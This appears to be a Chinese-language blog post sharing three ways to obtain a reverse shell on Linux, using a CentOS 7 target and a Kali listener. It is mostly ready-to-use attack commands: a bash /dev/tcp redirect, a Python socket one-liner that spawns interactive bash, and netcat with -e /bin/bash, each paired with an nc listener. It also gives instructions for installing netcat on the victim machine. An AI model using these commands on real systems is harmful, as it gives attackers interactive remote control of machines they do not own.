在网上整理了几种常见的linux下的反弹shell 的这几种方法,整理出后跟大家分享一下,我的被攻击机为Centos7,监听机为Kali2.0

第一种

首先,使用nc在kali上监听端口
nc -lvp port
在被攻击机器建立连接,ip为kali的ip,port为kali设置的port
bash -i >& /dev/tcp/ip/port 0>&1

第二种

首先,使用nc在kali上监听端口
nc -lvp port
第二种是利用python反弹shell,ip为kali的ip,port为kali设置的port
python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ip',port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"

第三种

第三种是被攻击端安装了nc,以centos为例,安装nc 的方式如下
1、wget https://sourceforge.net/projects/netcat/files/netcat/0.7.1/netcat-0.7.1.tar.gz/download
tar -zxvf netcat-0.7.1.tar.gz -C /usr/local
cd /usr/local
mv netcat-0.7.1 netcat cd /usr/local/netcat
./configure
make && make install
2、配置 vim /etc/profile 添加以下内容:
# set netcat path
export NETCAT_HOME=/usr/local/netcat
export PATH=$PATH:$NETCAT_HOME/bin
保存,退出,并使配置生效:
source /etc/profile

首先,使用nc在kali上监听端口
nc -lvp port
在被攻击机器建立连接,ip为kali的ip,port为kali设置的port
nc -e /bin/bash ip port